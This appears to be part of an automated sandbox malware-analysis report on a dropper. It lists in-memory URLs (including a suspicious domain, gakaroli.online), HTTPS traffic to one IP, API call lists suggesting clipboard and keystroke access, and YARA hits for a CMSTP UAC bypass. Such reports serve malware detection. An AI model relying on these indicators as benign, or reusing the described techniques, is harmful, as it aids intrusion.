                      Source: comvalidate_ljv3.exe, 0000000A.00000003.2464101114.00000000004AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gakaroli.online:443y
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://goto.itopupdate.com/appgoto?name=idr
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://s3.amazonaws.com/myfilelist/list
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://s3.amazonaws.com/myfilelist/list-dpm
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://s3.amazonaws.com/myfilelist/list-itop
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://s3.amazonaws.com/myfilelist/list-pdf
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://stats.reportcpanel.com/iusage_v2.php3
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://storage.googleapis.com/myfilelist/list
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://storage.googleapis.com/myfilelist/list-dpm
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://storage.googleapis.com/myfilelist/list-itopU
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://storage.googleapis.com/myfilelist/list-pdf
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://storage.googleapis.com/myfilelist/listU
                      Source: comvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E0F000.00000004.00001000.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E08000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
                      Source: comvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E0F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.catcert.cat/verCIT-10j
                      Source: IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.catcert.cat/verCIT-10x
                      Source: IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.catcert.net/verarrel
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
                      Source: comvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E08000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
                      Source: comvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E0F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                      Source: comvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E0F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                      Source: comvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E0F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: comvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E0F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: comvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E0F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
                      Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
                      Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknown HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49766 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49772 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49777 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49782 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49787 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49792 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49797 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49803 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49809 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49815 version: TLS 1.2
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe Code function: 10_2_0000000140007860 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SetClipboardData,CloseClipboard,10_2_0000000140007860
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe Code function: 10_2_0000000140007274 GetDlgItem,GetDlgItem,GetWindowRect,ScreenToClient,ScreenToClient,GetClientRect,CreateDIBSection,GetDC,CreateCompatibleDC,SelectObject,SelectObject,ReleaseDC,SendMessageW,10_2_0000000140007274
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe Code function: 10_2_00000001400038A8 KillTimer,GetAsyncKeyState,SetTimer,10_2_00000001400038A8
                      Source: Yara match File source: Process Memory Space: IDRBackup.exe PID: 7680, type: MEMORYSTR

                      System Summary

                      Source: 12.2.cmd.exe.30f07f8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 10.2.comvalidate_ljv3.exe.26d86ed.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 7.2.cmd.exe.49afa00.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 21.2.comvalidate_ljv3.exe.262baed.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.cmd.exe.4c48acd.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 12.2.cmd.exe.50a76cd.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 12.2.cmd.exe.5061a00.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 21.2.comvalidate_ljv3.exe.25e6a20.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 7.2.cmd.exe.49f56cd.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 21.2.comvalidate_ljv3.exe.262c6ed.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 12.2.cmd.exe.50a6acd.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.cmd.exe.4c496cd.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 10.2.comvalidate_ljv3.exe.26d7aed.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 10.2.comvalidate_ljv3.exe.2692a20.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 7.2.cmd.exe.49f4acd.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.cmd.exe.4c03a00.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe Code function: 10_2_000000014011FF38 CreateFileW,malloc,ReadFile,NtClose,10_2_000000014011FF38
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\69034d.msi
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{4D89D5F7-3F05-4FE5-88CD-06F9F4B7FE68}
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI512.tmp
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\69034f.msi
                      Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\69034f.msi
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DDAC2_2_5000DDAC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EDB42_2_5000EDB4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DDB42_2_5000DDB4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EDBC2_2_5000EDBC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DDBC2_2_5000DDBC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EDC42_2_5000EDC4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DDC42_2_5000DDC4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EDCC2_2_5000EDCC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DDCC2_2_5000DDCC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DDD42_2_5000DDD4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EDD42_2_5000EDD4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DDDC2_2_5000DDDC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EDDC2_2_5000EDDC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DDE42_2_5000DDE4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EDE42_2_5000EDE4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DDEC2_2_5000DDEC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EDEC2_2_5000EDEC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DDF42_2_5000DDF4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EDF42_2_5000EDF4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DDFC2_2_5000DDFC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EDFC2_2_5000EDFC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DE042_2_5000DE04
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE042_2_5000EE04
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DE0C2_2_5000DE0C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE0C2_2_5000EE0C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DE142_2_5000DE14
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE142_2_5000EE14
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DE1C2_2_5000DE1C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE1C2_2_5000EE1C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DE242_2_5000DE24
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE242_2_5000EE24
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DE2C2_2_5000DE2C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE2C2_2_5000EE2C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DE342_2_5000DE34
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE342_2_5000EE34
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DE3C2_2_5000DE3C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE3C2_2_5000EE3C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DE442_2_5000DE44
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE442_2_5000EE44
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DE4C2_2_5000DE4C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE4C2_2_5000EE4C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DE542_2_5000DE54
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE542_2_5000EE54
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE5C2_2_5000EE5C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE642_2_5000EE64
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE6C2_2_5000EE6C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE742_2_5000EE74
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE7C2_2_5000EE7C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE842_2_5000EE84
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE8C2_2_5000EE8C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE942_2_5000EE94
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EE9C2_2_5000EE9C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EEA42_2_5000EEA4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EEAC2_2_5000EEAC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DEAC2_2_5000DEAC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DEB42_2_5000DEB4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EEB42_2_5000EEB4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DEBC2_2_5000DEBC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EEBC2_2_5000EEBC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DEC42_2_5000DEC4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EEC42_2_5000EEC4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DECC2_2_5000DECC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EECC2_2_5000EECC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EED42_2_5000EED4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DED42_2_5000DED4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EEDC2_2_5000EEDC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DEDC2_2_5000DEDC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DEE42_2_5000DEE4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EEE42_2_5000EEE4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000DEEC2_2_5000DEEC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EEEC2_2_5000EEEC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EEF42_2_5000EEF4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_50002EFC2_2_50002EFC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EEFC2_2_5000EEFC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF042_2_5000EF04
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF0C2_2_5000EF0C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF142_2_5000EF14
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF1C2_2_5000EF1C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF242_2_5000EF24
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF2C2_2_5000EF2C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF342_2_5000EF34
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF3C2_2_5000EF3C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF442_2_5000EF44
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF4C2_2_5000EF4C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF542_2_5000EF54
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF5C2_2_5000EF5C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF642_2_5000EF64
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF6C2_2_5000EF6C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF742_2_5000EF74
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF7C2_2_5000EF7C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF842_2_5000EF84
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF8C2_2_5000EF8C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF942_2_5000EF94
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EF9C2_2_5000EF9C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EFA42_2_5000EFA4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EFAC2_2_5000EFAC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EFB42_2_5000EFB4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EFBC2_2_5000EFBC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EFC42_2_5000EFC4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EFCC2_2_5000EFCC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EFD42_2_5000EFD4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EFDC2_2_5000EFDC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EFE42_2_5000EFE4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EFEC2_2_5000EFEC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EFF42_2_5000EFF4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000EFFC2_2_5000EFFC
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeCode function: 3_2_6C486CDF3_2_6C486CDF
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000BFFC10_2_000000014000BFFC
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014001D00010_2_000000014001D000
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000B82410_2_000000014000B824
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014002F83810_2_000000014002F838
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000D84810_2_000000014000D848
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014002106810_2_0000000140021068
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000909C10_2_000000014000909C
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00000001400238F810_2_00000001400238F8
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014001A9B810_2_000000014001A9B8
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00000001400041C810_2_00000001400041C8
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00000001400231CC10_2_00000001400231CC
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_0000000140021A0010_2_0000000140021A00
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000E21410_2_000000014000E214
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_0000000140024A7810_2_0000000140024A78
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014001F2A410_2_000000014001F2A4
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000A37810_2_000000014000A378
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_0000000140122B9810_2_0000000140122B98
